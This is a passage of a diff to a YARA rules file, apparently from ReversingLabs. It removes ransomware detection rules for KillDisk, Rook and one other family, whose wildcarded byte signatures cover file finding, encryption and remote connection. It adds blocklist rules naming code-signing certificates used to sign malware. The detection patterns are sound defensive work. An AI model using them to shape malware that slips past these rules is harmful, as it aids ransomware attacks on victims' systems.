-            59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2
-            0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B
-            55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55
-            ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
-        }
-		$encrypt_files_p3 = {
-            E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ??
-            ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B
-            4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ??
-            57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B
-            55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9
-            ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 72 ??
-            81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B 4D
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
-        }
-		$encrypt_files_p4 = {
-            50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F
-            59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? E8 ??
-            ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 57 50 E8 ??
-            ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45
-            ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 53
-            FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 0F 1F 84 00 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F0 83 C4
-            ?? 85 F6 74 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66
-            0F 1F 84 00 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8
-            ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 56 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85 ??
-            ?? ?? ?? 57 56 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ??
-            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 50 6A ?? 53 FF 15 ?? ??
-            ?? ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ??
-            ?? 50 FF B6 ?? ?? ?? ?? 53 FF D7 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 6A ?? 6A
-            ?? 6A ?? FF 35 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 0F
-            84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ??
-            ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 8B 45 ?? 03 C0 50 E8 ??
-            ?? ?? ?? 8B F0 83 C4 ?? 80 3E ?? 74 ?? 8B 45 ?? 8B CE 85 C0 74 ?? 66 90 C6 01 ?? 8D
-            49 ?? 83 E8 ?? 75 ?? 8D 45 ?? 50 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF D7 6A ?? 8D 45 ?? 50 8B 45 ?? FF B0 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8B 45 ?? FF B0 ?? ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ??
-            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 6A ?? 50 FF 75 ?? FF
-            15
-        }
-		$remote_connection = {
-            FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 83 79 ?? ?? 72 ??
-            8B 09 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51 57 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85
-            F6 0F 84 ?? ?? ?? ?? 8B 4D ?? 53 83 79 ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? BB ?? ?? ?? ?? EB ?? 51 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BB
-            ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 8B C8 6A ?? E8 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ??
-            ?? 66 89 4D ?? 8D 4D ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8D 4D
-            ?? 83 E3 ?? E8 ?? ?? ?? ?? F6 C3 ?? 5B 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D
-            4D ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 0F
-            43 45 ?? 50 68 ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F
-            84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 3D ?? ??
-            ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 45 ??
-            85 C0 74 ?? C6 84 05 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ??
-            ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75 ?? 8B 7D
-            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45
-            ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D
-            ?? ?? 8D 4D ?? 8B 45 ?? 8D 55 ?? 0F 43 4D ?? 8B 75 ?? 03 C1 83 7D ?? ?? 8D 4D ?? 52
-            0F 43 4D ?? 50 51 8B CE E8 ?? ?? ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8D 4D
-            ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aleman Ltd" and pe.signatures [ i ] . serial == "37:ca:4f:66:fd:cc:87:32:99:27:23:19:98:59:88:6c" and 1505952000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Be2F22C152Bb218B898C4029056816A9 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d5ca9d9d-e80f-56c1-90b7-ef931e61ba92"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16080-L16098"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "cd99e4d97d9a60f409cf072bbae254486c307ae3cb6e34c5cd9648c972615f36"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marts GmbH" and ( pe.signatures [ i ] . serial == "00:be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" or pe.signatures [ i ] . serial == "be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" ) and 1676246400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Fc7065Abf8303Fb472B8Af85918F5C24 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects KillDisk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bd04ac88-987a-58f0-8f0a-508662b3c930"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "1aebd2be-b22c-5102-a449-27025f61cce6"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.KillDisk.yara#L1-L80"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16100-L16118"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6148e6fc1363ff8995a9100e07139bfa658c72892db4d30a973bad0f2b3e6c3f"
+		logic_hash = "f57ae32d7efd9cd4c0a207897e30b871dc32405c5b9ad844c9bb7eee4827cc5a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "KillDisk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ??
-            ?? 56 57 33 FF 8B F1 3B F7 89 7D ?? 89 7D ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56
-            FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 95 C0 84 C0 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8D
-            4C 24 ?? 89 7C 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? B8 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B 5C 24 ?? 3B DF 8B 44 24 ?? 89 45 ?? 89 5D ?? 77 ?? 83 F8 ?? 0F 82
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15
-            ?? ?? ?? ?? 8B E8 3B EF 0F 84 ?? ?? ?? ?? 83 FD ?? 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ??
-            ?? 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89
-            44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 54
-            24 ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            4C 24 ?? 51 8D 54 24 ?? 89 7C 24 ?? 52 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 8B C6 05 ?? ?? ?? ?? 50 8B CB 83 D1 ?? 51
-            6A ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 8D 4C 24 ?? 51 53 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D B4
-            24 ?? ?? ?? ?? 8D 7C 24 ?? 8D 44 24 ?? F3 A5 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 08 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24
-            ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 8D
-            74 24 ?? 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 6A ?? 53 50 55 FF 15
-            ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 54 24 ?? 52 55 C7 44 24 ?? ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B F0 8B 44 24 ?? F7 DE 1B F6 83 E6 ?? 50 83 C6 ?? FF 15 ??
-            ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 8B 44 24 ?? 50 BE ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB
-            ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B C6 EB ?? BE ?? ?? ?? ?? 8B C6 EB ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E
-            5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$app_whitelisting_1 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 32 DB FF 15
-            ?? ?? ?? ?? 6A ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B E8 85 ED 89 6C 24 ?? 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ??
-            51 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 64 24 ??
-            8B 54 24 ?? 3B 54 24 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 85 C0
-            0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1
-            2B C3 C1 F8 ?? 3B C7 0F 86 ?? ?? ?? ?? 3B D9 8B F3 76 ?? E8 ?? ?? ?? ?? 8B 1D ?? ??
-            ?? ?? 8B 0D ?? ?? ?? ?? 89 74 24 ?? 8D 34 BE 3B F1 B8 ?? ?? ?? ?? 8B E8 77 ?? 3B F3
-            73 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 3B 75 ?? 72 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ??
-            ?? 8B 44 24 ?? 39 06 74 ?? B8 ?? ?? ?? ?? 83 C7 ?? E8 ?? ?? ?? ?? 3B F8 72 ?? 8B 6C
-            24 ?? 8B 74 24 ?? FF 15 ?? ?? ?? ?? 3B F0 74 ?? 85 F6 74 ?? 56 6A ?? 6A ?? FF 15 ??
-            ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? EB ?? 8B
-            6C 24 ?? 8D 4C 24 ?? 51 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B3 ?? 55 FF 15
-            ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 8A C3 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ??
-            ?? ?? C3
-        }
-		$app_whitelisting_2 = {
-            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C4 50 8D 44
-            24 ?? 64 A3 ?? ?? ?? ?? 8D 44 24 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 70 ?? C7 44
-            24 ?? ?? ?? ?? ?? 56 C7 06 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 8B 36 EB
-            ?? 33 F6 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 72 ?? 8B 4C 24
-            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 64 89 0D
-            ?? ?? ?? ?? 59 5E 83 C4 ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIG IN VISION SP Z O O" and ( pe.signatures [ i ] . serial == "00:fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" or pe.signatures [ i ] . serial == "fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" ) and 1604361600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_698Ff388Adb50B88Afb832E76B0A0Ad1 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "8a6f4a15-08a5-5ca5-a743-55075726e744"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16120-L16136"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "b29bc69c8fd9543dba8f7d2a18d52b1bcbb8a8ae6f553d8b232ca74709b9addc"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_files and $app_whitelisting_1 and $app_whitelisting_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BELLAP LIMITED" and pe.signatures [ i ] . serial == "69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1" and 1675070541 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Rook : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_391Ae38670Ab188A5De26E07 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Rook ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "60bbfd57-18bb-58b3-9abc-ab30943bbddd"
-		date = "2022-01-17"
-		modified = "2022-01-17"
+		id = "aca9ac98-1c3b-5231-b6e5-97e3b8fec6de"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Rook.yara#L1-L122"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16138-L16154"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dc8b37e55b634de52855dd851dbaaf3e690adfb2e875d0e0c9ef5f4846c6ff30"
+		logic_hash = "f7ccfadab650ae3b6f950c9d1b35f86aa4a4e6c05479c014ab18881a405678f0"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Rook"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            48 2B D6 48 8D 4C 24 ?? 48 FF C2 41 B8 ?? ?? ?? ?? F6 D8 4D 1B FF 4C 23 FA 33 D2 E8
-            ?? ?? ?? ?? 45 33 C9 89 7C 24 ?? 4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CE FF 15
-            ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CE E8 ?? ?? ??
-            ?? 8B F8 48 83 FB ?? 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ??
-            48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F
-            5E 5D C3 49 8B 6E ?? 49 2B 2E 48 C1 FD ?? 80 7C 24 ?? ?? 75 ?? 8A 44 24 ?? 84 C0 74
-            ?? 3C ?? 75 ?? 40 38 7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D6 E8 ??
-            ?? ?? ?? 85 C0 75 ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06
-            49 8B 56 ?? 48 2B D0 48 C1 FA ?? 48 3B EA 0F 84 ?? ?? ?? ?? 48 2B D5 48 8D 0C E8 4C
-            8D 0D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-        }
-		$encrypt_files_p1 = {
-            40 55 53 56 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? 0F
-            B6 05 ?? ?? ?? ?? F2 0F 11 44 24 ?? 88 44 24 ?? E8 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ??
-            ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 CE ?? 48 8D 4C 24 ?? 89 35 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24
-            ?? FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0
-            0F 57 C9 F3 0F 7F 05 ?? ?? ?? ?? F3 0F 7F 0D ?? ?? ?? ?? F3 0F 7F 05 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 85 C0 48 89 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 0F 44 0D ?? ?? ??
-            ?? 48 89 0D ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C0 48 8D 15 ?? ??
-            ?? ?? 4C 63 C0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? 48 89 05 ?? ?? ?? ?? 33 DB 48 8B 05 ?? ?? ?? ?? 45 33 C9 48 89 05 ?? ?? ??
-            ?? 45 33 C0 48 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 C7
-        }
-		$encrypt_files_p2 = {
-            C1 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48
-            8D 85 ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D
-            25 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 45 33 C9 45 33 C0 4C 89 64 24 ?? 4C 89 BC 24
